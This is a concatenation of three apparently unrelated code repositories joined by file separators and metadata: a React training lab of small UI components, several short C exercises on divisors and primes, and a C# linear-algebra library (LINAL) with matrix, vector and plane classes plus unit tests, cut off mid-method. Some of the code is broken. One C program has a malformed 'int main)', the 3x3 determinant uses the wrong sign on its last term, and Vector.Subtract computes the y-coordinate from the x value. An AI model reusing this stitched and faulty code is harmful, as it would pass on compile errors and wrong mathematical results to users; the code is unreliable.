<file_sep>/starter-code/src/components/Carousel.jsx import React, { Component } from 'react'; 
export default class Carousel extends Component { state={ imgs: this.props, imgDisplayed: this.props.imgs[0], index:0 } afterPic=()=>{ let index=this.state.index; let allImgs=this.state.imgs; index<allImgs.imgs.length-1?index+=1:index=allImgs.imgs.length-1; let newImg=allImgs.imgs[index] this.setState({imgDisplayed:newImg,index:index}) } beforePic=()=>{ let index=this.state.index; let allImgs=this.state.imgs; index>0? index-=1:index=0; let newImg=allImgs.imgs[index] this.setState({imgDisplayed:newImg,index:index}) } render() { debugger return ( <div> <button onClick={this.beforePic}>Before</button> <img src={this.state.imgDisplayed} alt=""></img> <button onClick={this.afterPic}>After</button> </div> ) } } <file_sep>/starter-code/src/components/Greeting.jsx import React, { Component } from 'react' export default class Greeting extends Component { render() { const {lang}=this.props; let greeting=""; switch (lang) { case "de": greeting="Hallo"; break; case "fr": greeting="Bonjour"; break; default: greeting="Hello"; } return ( <div> <h3>{greeting} {this.props.children}</h3> </div> ) } } <file_sep>/starter-code/src/components/Creditcard.jsx import React, { Component } from 'react'; import './Creditcard.css'; export default class Creditcard extends Component { render() { const {type, number, expirationMonth, expirationYear, bank, owner, bgColor, color}=this.props; let image; if (type==="Visa") { image="img/visa.png" } else{ image="img/master-card.svg" } let displayedNum=number.slice(number.length-4,number.length); let month if (expirationMonth<10){ month="0" + expirationMonth }else{ month=expirationMonth } return ( <div className="eachCredit" style={{backgroundColor:bgColor,color:color}}> <div> <img src={image} alt=""></img> </div> <div> <p className="bankAcc"><span>• • • •</span> <span>• • • •</span> <span>• • • •</span> {displayedNum}</p> </div> <div> <div className="bankName"> <p>Expires {month}/{expirationYear}</p> <p>{bank}</p> </div> <p>{owner}</p> </div> </div> ) 
} } <file_sep>/starter-code/src/pages/CarouselPage.jsx import React, { Component } from 'react'; import Carousel from '../components/Carousel.jsx'; export default class CarouselPage extends Component { render() { return ( <div> <Carousel imgs={["https://randomuser.me/api/portraits/women/1.jpg", "https://randomuser.me/api/portraits/men/1.jpg", "https://randomuser.me/api/portraits/women/2.jpg", "https://randomuser.me/api/portraits/men/2.jpg"]} /> </div> ) } } <file_sep>/starter-code/src/components/Nav.jsx import React, { Component } from 'react'; import {Link} from "react-router-dom"; export default class Nav extends Component { render() { return ( <div> <ul> <li><Link to="/idCard">Id Card</Link></li> <li><Link to="/greetings">Greetings</Link></li> <li><Link to="/random">Random Number</Link></li> <li><Link to="/boxcolor">Box Color</Link></li> <li><Link to="/creditcard">Credit Card</Link></li> <li><Link to="/rating">Rating</Link></li> <li><Link to="/driverCard">Diver's Card</Link></li> <li><Link to="/like">Like Button</Link></li> <li><Link to="/clickable">Clickable Picture</Link></li> <li><Link to="/dice">Dice</Link></li> <li><Link to="/carousel">Carousel</Link></li> <li><Link to="/numbersTable">Numbers Table</Link></li> </ul> </div> ) } } <file_sep>/starter-code/src/components/ClickablePicture.jsx import React, { Component } from 'react'; export default class ClickablePicture extends Component { state ={ display2: "none", display1:"block" } togglePic=()=>{ debugger return( this.state.display1==="block" && this.state.display2==="none"? this.setState({display1:"none",display2:"block"}): this.setState({display1:"block",display2:"none"}) ) } render() { const {imgClicked,img}=this.props; return ( <div> <img style={{display:this.state.display1}} onClick={this.togglePic} src={img} alt=""></img> <img style={{display:this.state.display2}} onClick={this.togglePic} src={imgClicked} alt=""></img> </div> ) } }
9fdb16d70332d5410a7ee2d831a3c5f290631004
[ "JavaScript" ]
18
JavaScript
jennifervphan/lab-react-training
ed0fb6401ce4098916bbf5b909b69228e24daa65
4281262fe6859618595afafd192bfb90edf11a24
refs/heads/master
<file_sep>#include <stdio.h> int main() { int n, tong = 0; printf("Nhap so n : "); scanf("%d",&n); for(int i = 1 ; i <= n ; i++){ if(n % i == 0 ){ printf("U = %d\n",i); tong += i; } } printf("Tong cac uoc la: %d",tong); } <file_sep>#include <stdio.h> int main() { int n, tong = 0 , check = 0; printf("Nhap so n : "); scanf("%d",&n); for(int i = 2 ; i < n ; i++){ for(int j = 2 ; j < i ; j++){ if(i % j == 0){ check++; } } if(check == 0){ printf("N = %d\n",i); }else{ check = 0; } } } <file_sep>#include <stdio.h> int main() { int n; printf("Nhap so n : "); scanf("%d",&n); printf("Cac so chan nho hon n la: \n"); for(int i = 0 ; i < n ; i++){ if(i % 2 == 0 ){ printf("%d\n",i); } } } <file_sep>#include <stdio.h> int main) { int a , b ; printf("Nhap so a (a < b): "); scanf("%d",&a); printf("Nhap so b (b > a): "); scanf("%d",&b); if(a < b){ for(a ; a < b ; a++){ if(a < 2){ continue; } int check = 0; for(int i = 2 ; i < a ; i++){ if(a % i == 0){ check++; } } if(check == 0){ printf("N = %d\n",a); } } }else{ printf("Ban nhap sai !! Nhap a < b"); } }
c91cd0693ebe5f3115c2d3be56feac202ddcb404
[ "C++" ]
4
C++
Manh2362000/T2008M_LBEP
50bc5fc8305fd8458005dfea26fe8aa3ed263d91
5d2803e5869198869172c02da0c4bd91c9924c72
refs/heads/master
<file_sep><?php /** * @file * Contains \Drupal\drupal8_base_module\Controller\BaseModuleController. */ namespace Drupal\drupal8_base_module\Controller; use Drupal\Core\Controller\ControllerBase; /** * Controller routines for my module routes. */ class BaseModuleController extends ControllerBase { /** * Returns an administrative overview of my module. * * @return array * A render array representing the administrative page content. */ public function adminOverview() { return array( '#type' => 'markup', '#markup' => $this->t('Hello, World!'), ); } } <file_sep>CONTENTS OF THIS FILE --------------------- * Introduction * Requirements * Recommended modules * Installation * Configuration * Troubleshooting * FAQ * Maintainers * References INTRODUCTION ------------ This is a codebase to create and develop your custom Drupal 8 module. REQUIREMENTS ------------ RECOMMENDED MODULES ------------------- INSTALLATION ------------ * Install as you would normally install a contributed Drupal module. See: https://drupal.org/documentation/install/modules-themes/modules-7 for further information. CONFIGURATION ------------- * On the setting page /admin/config/my-module-setting insert the title and the description for your feed and choose which product you want to include into it. TROUBLESHOOTING --------------- FAQ --- MAINTAINERS ----------- Current maintainers: * <NAME> (robertoperuzzo) - https://www.drupal.org/u/robertoperuzzo This project has been sponsored by: * STUDIO AQUA Specialized in designing and developing Drupal powered sites, we belive that the online business is measurable for a environmentally sustainable Web. Visit http://www.studioaqua.it for more information. 
REFERENCES ---------- * Creating Drupal 8.x modules (https://www.drupal.org/developing/modules/8) * Routing system in Drupal 8 (https://www.drupal.org/node/2122071) * D7 to D8 upgrade tutorial: Convert hook_menu() and hook_menu_alter() to Drupal 8 APIs (https://www.drupal.org/node/2118147) * PSR-4 namespaces and autoloading in Drupal 8 (https://www.drupal.org/node/2156625) * Building modules with Drupal 8 (https://docs.acquia.com/articles/building-drupal-8-modules) * README Template (https://www.drupal.org/node/1800686)
d97e6bba7e431f6c3d2f2f3400205d5e423fb9d6
[ "Text", "PHP" ]
2
PHP
studioaqua/drupal8_base_module
dba1c91715794526fda87a5e9edd375997ee3ad4
ae2d2aed840dfe71eb2680bfe9c5adf1f94ae8b2
refs/heads/master
<file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace LINAL { public class Point { private float x; private float y; private float z; public Point(float x, float y) { this.x = x; this.y = y; } public Point(float x, float y, float z) { this.x = x; this.y = y; this.z = z; } public float GetX() { return x; } public void SetX(float x) { this.x = x; } public float GetY() { return y; } public void SetY(float y) { this.y = y; } public float GetZ() { return z; } public void SetZ(float z) { this.z = z; } public bool Is3D() { return z != 0; } public Vector MakeVector() { Point p2 = new Point(x,y,z); Point p1 = new Point(0,0,0); return new Vector(p1, p2); } } } <file_sep>using System; using LINAL; using Microsoft.VisualStudio.TestTools.UnitTesting; namespace LINAL_Test { [TestClass] public class MatrixTest { private Matrix mockingMatrix; [TestInitialize] public void init() { mockingMatrix = new Matrix(3, 3); float[,] data = { { 0, 1, 2 }, { 1, 2, 4 }, { 8, 4, 2 } }; mockingMatrix.SetData(data); } [TestMethod] public void MatrixInversion() { mockingMatrix.Invert(); Matrix m2 = new Matrix(3,3); float[,] data2 = { { -2, 1, 0 }, { 5, ((float)-8/3), ((float)1/3) }, { -2, ((float)4/3), ((float)-1/6) } }; m2.SetData(data2); bool identical = true; for (int row = 0; row < mockingMatrix.GetRows(); row++) { for (int column = 0; column < mockingMatrix.GetColumns(); column++) { if (mockingMatrix.Get(row, column) != m2.Get(row, column)) { identical = false; break; } } } Assert.AreEqual(true,identical); } [TestMethod] public void MatrixScaling() { mockingMatrix.Scale(1.1f, 1.1f, 1.1f, false); Matrix m2 = new Matrix(3, 3); float[,] data2 = { { 0, 1.1f, 2.2f }, { 1.1f, 2.2f, 4.4f }, { 8.8f, 4.4f, 2.2f } }; m2.SetData(data2); bool identical = true; for (int row = 0; row < mockingMatrix.GetRows(); row++) { for (int column = 0; column < mockingMatrix.GetColumns(); column++) { if (mockingMatrix.Get(row, column) != 
m2.Get(row, column)) { identical = false; break; } } } Assert.AreEqual(true, identical); } [TestMethod] public void MatrixTranslate() { mockingMatrix.Translate(5, 3, 12, true); Matrix m2 = new Matrix(3, 3); float[,] data2 = { { 5, 6, 7 }, { 4, 5, 7 }, { 20, 16, 14 } }; m2.SetData(data2); bool identical = true; for (int row = 0; row < mockingMatrix.GetRows(); row++) { for (int column = 0; column < mockingMatrix.GetColumns(); column++) { if (mockingMatrix.Get(row, column) != m2.Get(row, column)) { identical = false; break; } } } Assert.AreEqual(true, identical); } } } <file_sep>using System; using System.Collections.Generic; using System.Data.Common; using System.Linq; using System.Resources; using System.Text; using System.Threading.Tasks; using System.Xaml; namespace LINAL { public class Matrix { private float[,] _data; /* * Creates a new matrix */ public Matrix(int rows, int columns) { _data = new float[rows,columns]; } /* * Gets the amount of rows of the matrix */ public int GetRows() { return _data.GetLength(0); } /* * Gets the amount of columns of the matrix */ public int GetColumns() { return _data.GetLength(1); } /* * Gets the entire dataset of the matrix */ public float[,] GetData() { return _data; } /* * Sets the entire dataset of the matrix */ public void SetData(float[,] data) { _data = data; } /* * Gets on particular number in the datamatrix, based on the row and the column */ public float Get(int row, int column) { if (row >= 0 && row < _data.GetLength(0) && column >= 0 && column < _data.GetLength(1)) return _data[row, column]; return 0; } /* * Sets the data of one particular place in the dataset */ public void Set(int row, int column, float number) { if (row >= 0 && row < _data.GetLength(0) && column >= 0 && column < _data.GetLength(1)) _data[row, column] = number; } /* * Adds the data of a vector to the dataset */ public void AddVector(int column, Vector v) { if (GetRows() < 4) SetSizeWithData(4, GetColumns()); if(column >= GetColumns()) 
SetSizeWithData(GetRows(), GetColumns()+1); if (column >= GetColumns()) SetSizeWithData(GetRows(), GetColumns() + 1); if (column >= 0) { _data[0, column] = v.GetPoint(0).GetX(); _data[1, column] = v.GetPoint(0).GetY(); _data[2, column] = v.GetPoint(0).GetZ(); if (v.GetHelp() > 0) _data[3, column] = 1; _data[0, column+1] = v.GetPoint(1).GetX(); _data[1, column+1] = v.GetPoint(1).GetY(); _data[2, column+1] = v.GetPoint(1).GetZ(); if (v.GetHelp() > 0) _data[3, column+1] = 1; } } /* * Removes a number from the dataset, based on row and column */ public void Remove(int row, int column) { if (row >= 0 && row < _data.GetLength(0) && column >= 0 && column < _data.GetLength(1)) _data[row, column] = 0; } /* * Sets the size of the dataset, keeping the data in the dataset if possible */ public void SetSizeWithData(int rows, int columns) { float[,] backup = _data; SetSizeWithoutData(rows, columns); for (int row = 0; row < backup.GetLength(0); row++) { for (int column = 0; column < backup.GetLength(1); column++) { if (row < _data.GetLength(0) && column < _data.GetLength(1)) _data[row, column] = backup[row, column]; } } } /* * Sets the size of the dataset, completely removing the previous data */ public void SetSizeWithoutData(int rows, int columns) { _data = new float[rows,columns]; } /* * Resets all values and makes identity matrix */ public void MakeIdentityMatrix() { MakeNullMatrix(); int column = 0; for (int row = 0; row < _data.GetLength(0); row++) { _data[row, column] = 1; column++; } } /* * Resets all values and makes null matrix */ public void MakeNullMatrix() { for (int row = 0; row < _data.GetLength(0); row++) { for (int column = 0; column < _data.GetLength(1); column++) { _data[row, column] = 0; } } } /* * Translates current dataset over x, y , z. 
Also checks if translation is three dimensional */ public void Translate(float x, float y, float z = 0, bool threedim = false) { bool addedHelpRow = false; Matrix translation = MatrixFactory.GetTranslationMatrix(x, y, z, threedim); if (translation.GetColumns() != GetRows()) { AddHelpRow(); addedHelpRow = true; } translation.Multiply(this); _data = translation.GetData(); if(addedHelpRow) RemoveHelpRow(); } /* * Scales current dataset over x, y, z. Also checks if the dataset contains points instead of vectors */ public void Scale(float x, float y, float z = 0, bool points = true) { Matrix scaling = MatrixFactory.GetScalingMatrix(this, x, y, z); if (points) ScalePoints(scaling); else ScaleVectors(scaling); } /* * Scales points of vectors */ public void ScalePoints(Matrix scaling) { Dictionary<string, List<int>> linkedPoints = new Dictionary<string, List<int>>(); for (int column = 0; column < GetColumns(); column++) { string point = _data[0, column] + ":" + _data[1, column] + ":" + _data[2, column]; if (!linkedPoints.ContainsKey(point)) linkedPoints.Add(point, new List<int>()); linkedPoints[point].Add(column); } Dictionary<int, Point> modifiedPoints = new Dictionary<int, Point>(); Matrix a = ConvertToVectors(); scaling.Multiply(a); int vector = 0; for (int column = 0; column < GetColumns(); column += 2, vector++) { float difX = scaling.Get(0, vector) - a.Get(0, vector); float difY = scaling.Get(1, vector) - a.Get(1, vector); float difZ = scaling.Get(2, vector) - a.Get(2, vector); float x1 = _data[0, column]; float y1 = _data[1, column]; float z1 = _data[2, column]; float x2 = _data[0, column + 1]; float y2 = _data[1, column + 1]; float z2 = _data[2, column + 1]; modifiedPoints.Add(column, new Point(x1 - (difX / 2), y1 - (difY / 2), z1 - (difZ / 2))); modifiedPoints.Add(column + 1, new Point(x2 + (difX / 2), y2 + (difY / 2), z2 + (difZ / 2))); } foreach (string key in linkedPoints.Keys) { string[] str = key.Split(':'); Point original = new Point(float.Parse(str[0]), 
float.Parse(str[1]), float.Parse(str[2])); float deltaX = 0; float deltaY = 0; float deltaZ = 0; foreach (int column in linkedPoints[key]) { if (!modifiedPoints.ContainsKey(column)) continue; Point p = modifiedPoints[column]; deltaX += (p.GetX() - original.GetX()); deltaY += (p.GetY() - original.GetY()); deltaZ += (p.GetZ() - original.GetZ()); } Point newPoint = new Point(original.GetX() + deltaX, original.GetY() + deltaY, original.GetZ() + deltaZ); foreach (int column in linkedPoints[key]) { _data[0, column] = newPoint.GetX(); _data[1, column] = newPoint.GetY(); _data[2, column] = newPoint.GetZ(); } } } /* * Scales just vectors */ public void ScaleVectors(Matrix scaling) { scaling.Multiply(this); _data = scaling.GetData(); } /* * Used to rotate the dataset */ public void Rotate(float angle, bool threedim, Point p1, Point p2 = null) { if(threedim) Rotate3D(angle, p1, p2); else Rotate2D(angle, p1); } /* * Rotate a 3D matrix a vector going through the origin, or not */ public void Rotate3D(float angle, Point p1, Point p2 = null) { Vector v = null; Point over = null; if (p2 == null) v = new Vector(new Point(0, 0, 0), p1); else { v = new Vector(p1, p2); over = p1; } Matrix rotation = MatrixFactory.Get3DRotationMatrix(angle, v, over); rotation.Multiply(this); _data = rotation.GetData(); } /* * Rotates the dataset over a point, or the origin */ public void Rotate2D(float angle, Point p = null) { if (p == null) { Matrix rotation = MatrixFactory.Rotate2D(angle); Multiply(rotation); } else { Point inverse = new Point(-p.GetX(), -p.GetY(), -p.GetZ()); Translate(-p.GetX(), -p.GetY(), -p.GetZ(), false); Matrix rotation = MatrixFactory.Rotate2D(angle); Multiply(rotation); Translate(p.GetX(), p.GetY(), p.GetZ(), false); } } /* * Gets the highest number in the sequence in the matrix. 
Used for inversion */ public int GetColumnOfHighestInRow(int column) { int num = 0; for (int i = 0; i < GetRows(); i++) { if (_data[i, column] > num) num = i; } return num; } /* * Adds a help row to sustain conventions */ public void AddHelpRow() { SetSizeWithData(GetRows()+1,GetColumns()); for (int i = 0; i < GetColumns(); i++) _data[GetRows()-1, i] = 1; } /* * Removes the help row that sustains conventions */ public void RemoveHelpRow() { SetSizeWithData(GetRows() - 1, GetColumns()); } /* * Switches rowdata in the matrix */ public void SwitchValues(int row1, int row2) { for (int i = 0; i < GetColumns(); i++) { float backup = _data[row1, i]; _data[row1, i] = _data[row2, i]; _data[row2, i] = backup; } } /* * Prints the matrix */ public void Print() { for (int row = 0; row < _data.GetLength(0); row++) { for (int column = 0; column < _data.GetLength(1); column++) { Console.Write(_data[row, column] + " "); } Console.WriteLine(); } } /* * Inverts the matrix. Cannot be used with points, only vectors */ public void Invert() { if (GetDeterminant() == 0) return; Matrix inversion = new Matrix(GetRows(), GetRows()); inversion.MakeIdentityMatrix(); if (_data[0, 0] == 0f) { int row = GetColumnOfHighestInRow(0); SwitchValues(0,row); inversion.SwitchValues(0,row); } for (int column = 0; column < GetColumns(); column++) { if (_data[column, column] != 1) { float divideBy = _data[column, column]; ModifyRow(divideBy, Operator.DIVIDE, column); inversion.ModifyRow(divideBy, Operator.DIVIDE, column); } for (int row = 0; row < GetRows(); row++) { if (row == column) continue; if (_data[row, column] == 0) continue; float multiplyBy = _data[row, column]/_data[column, column]; for (int col = 0; col < GetColumns(); col++) { float value = _data[column, col]*multiplyBy; float inversionValue = inversion.Get(column, col)*multiplyBy; ModifyRow(value, Operator.SUBTRACT, row, col); inversion.ModifyRow(inversionValue, Operator.SUBTRACT, row, col); } } } _data = inversion.GetData(); } /* * Modifies 
the values in the row */ public void ModifyRow(float value, Operator op, int row, int column = -1) { if (column > -1) { if (op == Operator.ADD) _data[row, column] += value; else if (op == Operator.SUBTRACT) _data[row, column] -= value; else if (op == Operator.DIVIDE) _data[row, column] /= value; else if (op == Operator.MULTIPLY) _data[row, column] *= value; return; } for (column = 0; column < GetColumns(); column++) { if (op == Operator.ADD) _data[row, column] += value; else if (op == Operator.SUBTRACT) _data[row, column] -= value; else if (op == Operator.DIVIDE) _data[row, column] /= value; else if (op == Operator.MULTIPLY) _data[row, column] *= value; } } /* * Determines the determinant of the matrix */ public float GetDeterminant() { //2D if (GetColumns() < 3) return _data[0, 0]*_data[1, 1] - _data[0, 1]*_data[1, 0]; //3D else { float a = _data[0, 0]*(_data[1, 1]*_data[2, 2] - _data[1, 2]*_data[2, 1]); float b = _data[0, 1] * (_data[1, 0] * _data[2, 2] - _data[2, 0] * _data[1, 2]); float c = _data[0, 2] * (_data[1, 0] * _data[2, 1] - _data[2, 0] * _data[1, 1]); return a - b - c; } } /* * Dot-product. 
Multiplies the matrix with another */ public void Multiply(Matrix matrix) { if (matrix.GetRows() != GetColumns()) return; Matrix result = new Matrix(GetRows(), matrix.GetColumns()); for (int secondColumns = 0; secondColumns < matrix.GetColumns(); secondColumns++) { for (int secondRows = 0; secondRows < matrix.GetRows(); secondRows++) { for (int firstRows = 0; firstRows < GetRows(); firstRows++) { float num = 0; for (int firstColumns = 0; firstColumns < GetColumns(); firstColumns++) num += Get(firstRows, firstColumns) * matrix.Get(firstColumns, secondColumns); result.Set(firstRows, secondColumns, num); } } } _data = result.GetData(); } /* * Convert points to vectors */ public Matrix ConvertToVectors() { Matrix m = new Matrix(GetRows(), GetColumns()/2); float[,] data = new float[GetRows(),GetColumns()/2]; int newColumn = 0; for (int column = 0; column < GetColumns(); column+=2, newColumn++) { float x = _data[0, column + 1] - _data[0, column]; float y = _data[1, column + 1] - _data[1, column]; float z = _data[2, column + 1] - _data[2, column]; data[0, newColumn] = x; data[1, newColumn] = y; data[2, newColumn] = z; data[3, newColumn] = 1; } m.SetData(data); return m; } /* * Gets the middle point of a matrix */ public Point GetMiddle() { List<Point> points = new List<Point>(); for (int column = 0; column < GetColumns(); column++) { float x = _data[0, column]; float y = _data[1, column]; float z = _data[2, column]; bool existsInList = false; foreach (Point p in points) { if (p.GetX() == x && p.GetY() == y && p.GetZ() == z) { existsInList = true; break; } } if(!existsInList) points.Add(new Point(x,y,z)); } float x1 = float.MinValue; float x2 = float.MaxValue; float y1 = float.MinValue; float y2 = float.MaxValue; float z1 = float.MinValue; float z2 = float.MaxValue; foreach (Point p in points) { if (p.GetX() > x1) x1 = p.GetX(); else if (p.GetX() < x2) x2 = p.GetX(); if (p.GetY() > y1) y1 = p.GetY(); else if (p.GetY() < y2) y2 = p.GetY(); if (p.GetZ() > z1) z1 = p.GetZ(); 
else if (p.GetZ() < z2) z2 = p.GetZ(); } float newX = x1 + ((x2 - x1)/2); float newY = y1 + ((y2 - y1) / 2); float newZ = z1 + ((z2 - z1) / 2); return new Point(newX, newY, newZ); } /* * Get the middle of the furthest and nearest X coordinate */ public float GetWidth() { List<Point> points = new List<Point>(); for (int column = 0; column < GetColumns(); column++) { float x = _data[0, column]; float y = _data[1, column]; float z = _data[2, column]; bool existsInList = false; foreach (Point p in points) { if (p.GetX() == x && p.GetY() == y && p.GetZ() == z) { existsInList = true; break; } } if (!existsInList) points.Add(new Point(x, y, z)); } float x1 = float.MinValue; float x2 = float.MaxValue; foreach (Point p in points) { if (p.GetX() > x1) x1 = p.GetX(); else if (p.GetX() < x2) x2 = p.GetX(); } return x2 - x1; } } public enum Operator { ADD = 0, SUBTRACT = 1, DIVIDE = 2, MULTIPLY = 3, } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Runtime.CompilerServices; using System.Text; using System.Threading.Tasks; namespace LINAL { public class Plane { private readonly List<Point> _points = new List<Point>(); private float formulaX; private float formulaY; private float formulaZ; private float formulaAnswer; /* * Adds a point to the plane */ public void Add(Point p) { _points.Add(p); } /* * Removes a point from the plane */ public void Remove(Point p) { _points.Remove(p); } /* * Removes a point from the plane */ public void Remove(int index) { _points.RemoveAt(index); } /* * Gets all points */ public List<Point> GetPoints() { return _points; } /* * Returns the support vector */ public Vector GetSupportVector() { return _points[0].MakeVector(); } /* * Returns the normal vector */ public Vector GetNormalVector() { return GetDirectionalVectors()[0].GetCrossProduct(GetDirectionalVectors()[1]); } /* * Returns the radians of the inproduct */ public double GetRadiansFromInproduct(float inproduct) { var vectors = 
GetDirectionalVectors(); double result = inproduct/(vectors[0].GetLength()*vectors[1].GetLength()); return Math.Acos(result); } /* * Returns the angle of the inproduct */ public double GetAngleFromInproduct(float inproduct) { var radians = GetRadiansFromInproduct(inproduct); return radians/Math.PI*180; } /* * Checks if a point resides within the plane */ public bool IsInPlane(Point p) { return (formulaX*p.GetX()) + (formulaY*p.GetY()) + (formulaZ*p.GetZ()) == formulaAnswer; } /* * Returns the directional vectors of the plane */ public List<Vector> GetDirectionalVectors() { var v = new List<Vector>(); for (var i = 1; i < _points.Count; i++) { var p = _points[i]; var x = p.GetX() - GetSupportVector().GetX(); var y = p.GetY() - GetSupportVector().GetY(); var z = p.GetZ() - GetSupportVector().GetZ(); while (true) { if (x % 2 == 0 && y % 2 == 0 && z % 2 == 0) { x /= 2; y /= 2; z /= 2; } else { break; } } v.Add((new Point(x,y,z)).MakeVector()); } return v; } /* * Builds the formula to see wether a point resides in a plane */ public void BuildFormula() { var vectors = GetDirectionalVectors(); if (vectors[0].IsDependantOf(vectors[1])) return; var normalVector = vectors[0].GetCrossProduct(vectors[1]); formulaX = normalVector.GetX(); formulaY = normalVector.GetY(); formulaZ = normalVector.GetZ(); formulaAnswer = normalVector.GetInproduct(GetSupportVector()); } } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Navigation; namespace LINAL { class MatrixFactory { /* * Returns a scaling matrix, two and three dimensional */ public static Matrix GetScalingMatrix(Matrix m, float x, float y, float z= 0) { Matrix scalingMatrix = new Matrix(m.GetRows(), m.GetRows()); scalingMatrix.Set(0, 0, x); scalingMatrix.Set(1, 1, y); if (z != 0) scalingMatrix.Set(2, 2, z); return scalingMatrix; } /* * Returns a translation matrix, two and three dimensional */ public static Matrix 
GetTranslationMatrix(float x, float y, float z = 0, bool threedim = false) { Matrix translationMatrix = null; if (threedim) { translationMatrix = new Matrix(4, 4); translationMatrix.MakeIdentityMatrix(); translationMatrix.Set(0, 3, x); translationMatrix.Set(1, 3, y); translationMatrix.Set(2, 3, z); } else { translationMatrix = new Matrix(3, 3); translationMatrix.MakeIdentityMatrix(); translationMatrix.Set(0, 2, x); translationMatrix.Set(1, 2, y); } return translationMatrix; } /* * Returns a 2D rotation matrix. */ public static Matrix Rotate2D(float alpha) { Matrix rotationMatrix = new Matrix(2,2); float cos = GonioFactory.GetTrigonometricByDegrees(alpha, Trigonometric.Cosine); float sin = GonioFactory.GetTrigonometricByDegrees(alpha, Trigonometric.Sine); float[,] data = { {cos,-sin}, {sin,cos} }; rotationMatrix.SetData(data); return rotationMatrix; } /* * Returns a 3D rotation matrix, over a vector, or a vector through the origin */ public static Matrix Get3DRotationMatrix(float alpha, Vector rotationVector, Point translateOver = null) { Matrix rotationMatrix = new Matrix(4,4); rotationMatrix.MakeIdentityMatrix(); if (translateOver != null) { Matrix translation = GetTranslationMatrix(-translateOver.GetX(), -translateOver.GetY(), -translateOver.GetZ(), true); translation.Multiply(rotationMatrix); rotationMatrix = translation; } float t1 = GonioFactory.GetArcTrigonometricByRadians(rotationVector.GetZ(), rotationVector.GetX(), Trigonometric.Tangent2); var yRotation = MatrixFactory.Rotate3DYAxis(t1, true); yRotation.Multiply(rotationMatrix); rotationMatrix = yRotation; float newX = (float)Math.Sqrt(rotationVector.GetX() * rotationVector.GetX() + rotationVector.GetZ() * rotationVector.GetZ()); float t2 = GonioFactory.GetArcTrigonometricByRadians(rotationVector.GetY(), newX, Trigonometric.Tangent2); var zRotation = MatrixFactory.Rotate3DZAxis(t2, true); zRotation.Multiply(rotationMatrix); rotationMatrix = zRotation; Matrix rotate = 
MatrixFactory.Rotate3DXAxis(GonioFactory.DegreesToRadians(alpha), false); rotate.Multiply(rotationMatrix); rotationMatrix = rotate; var reverseZRotation = MatrixFactory.Rotate3DZAxis(t2, false); reverseZRotation.Multiply(rotationMatrix); rotationMatrix = reverseZRotation; var reverseYRotation = MatrixFactory.Rotate3DYAxis(t1, false); reverseYRotation.Multiply(rotationMatrix); rotationMatrix = reverseYRotation; if (translateOver != null) { Matrix translation = GetTranslationMatrix(translateOver.GetX(), translateOver.GetY(), translateOver.GetZ(), true); translation.Multiply(rotationMatrix); rotationMatrix = translation; } return rotationMatrix; } /* * Returns a 3D matrix based on the X axis */ public static Matrix Rotate3DXAxis(float alpha, bool reverse) { Matrix rotationMatrix = new Matrix(4, 4); float cos = GonioFactory.GetTrigonometricByRadians(alpha, Trigonometric.Cosine); float sin = GonioFactory.GetTrigonometricByRadians(alpha, Trigonometric.Sine); if (reverse) sin = -sin; float[,] data = { {1, 0, 0, 0}, {0, cos, -sin, 0}, {0, sin, cos, 0}, {0,0,0,1 } }; rotationMatrix.SetData(data); return rotationMatrix; } /* * Returns a 3D matrix based on the Y axis */ public static Matrix Rotate3DYAxis(float alpha, bool reverse) { Matrix rotationMatrix = new Matrix(4, 4); float cos = GonioFactory.GetTrigonometricByRadians(alpha, Trigonometric.Cosine); float sin = GonioFactory.GetTrigonometricByRadians(alpha, Trigonometric.Sine); if (reverse) sin = -sin; float[,] data = { { cos, 0, -sin, 0}, {0, 1, 0, 0}, {sin, 0, cos, 0}, {0,0,0,1 } }; rotationMatrix.SetData(data); return rotationMatrix; } /* * Returns a 3D matrix based on the Z axis */ public static Matrix Rotate3DZAxis(float alpha, bool reverse) { Matrix rotationMatrix = new Matrix(4, 4); float cos = GonioFactory.GetTrigonometricByRadians(alpha, Trigonometric.Cosine); float sin = GonioFactory.GetTrigonometricByRadians(alpha, Trigonometric.Sine); if (reverse) sin = -sin; float[,] data = { {cos, -sin, 0, 0}, {sin, cos, 0, 
0}, {0, 0, 1, 0}, {0,0,0,1 } }; rotationMatrix.SetData(data); return rotationMatrix; } } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace LINAL { public class Vector { private Point[] points = new Point[2]; private float help; public Vector(Point p1, Point p2) { points[0] = p1; points[1] = p2; this.help = 1; } public Point GetPoint(int index) { return points[index]; } public float GetX() { return points[1].GetX() - points[0].GetX(); } public float GetY() { return points[1].GetY() - points[0].GetY(); } public float GetZ() { return points[1].GetZ() - points[0].GetZ(); } public float GetHelp() { return help; } public void SetHelp(int help) { this.help = help; } /* * Returns the length of the vector */ public float GetLength() { return (float) Math.Sqrt(GetX()*GetX() + GetY()*GetY() + GetZ()*GetZ()); } /* * Checks if this vector is dependant of the other vector */ public bool IsDependantOf(Vector v) { var factorX = GetX() / v.GetX(); var factorY = GetY() / v.GetY(); var factorZ = GetZ() / v.GetZ(); return factorX == factorY && factorY == factorZ; } /* * Adds a vector to this one */ public Vector Add(Vector v) { float x = GetX() + v.GetX(); float y = GetY() + v.GetY(); float z = GetZ() + v.GetZ(); Point p = new Point(GetPoint(0).GetX() + x, GetPoint(0).GetY() + y, GetPoint(0).GetZ() + z); return new Vector(GetPoint(0), p); } /* * Subtracts a vector from this one */ public Vector Subtract(Vector v) { float x = GetX() - v.GetX(); float y = GetY() - v.GetY(); float z = GetZ() - v.GetZ(); Point p = new Point(GetPoint(0).GetX() + x, GetPoint(0).GetX() + y, GetPoint(0).GetZ()+z); return new Vector(GetPoint(0), p); } /* * Transforms vector to a unit vector */ public void MakeUnitVector() { float length = GetLength(); float x = GetX() / length; float y = GetY() / length; float z = GetZ() / length; points[1].SetX(x); points[1].SetY(y); points[1].SetZ(z); } /* * Enlarges the vector */ public 
